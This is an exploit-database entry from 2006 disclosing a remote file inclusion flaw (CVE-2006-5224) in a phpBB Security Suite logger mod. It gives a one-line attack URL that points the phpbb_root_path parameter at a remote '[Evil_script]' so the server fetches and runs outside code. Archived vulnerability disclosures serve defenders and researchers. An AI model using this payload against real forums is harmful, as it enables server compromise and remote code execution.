[] NeoSense

phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion

Author: SpiderZ
type: webapps
platform: php
port: 
date_added: 2006-10-04 
date_updated:  
verified: 1 
codes: OSVDB-29550;CVE-2006-5224 
tags: 
aliases:  
screenshot_url:  
application_url: 

           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Security Suite IP Logger Remote File Inclusion Vulnerability
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion - Security Suite IP Logger



http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]



-------------------------------------------------------------------------

# Download: http://www.phpbb.de/viewtopic.php?t=30261

# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip

-------------------------------------------------------------------------

# milw0rm.com [2006-10-05]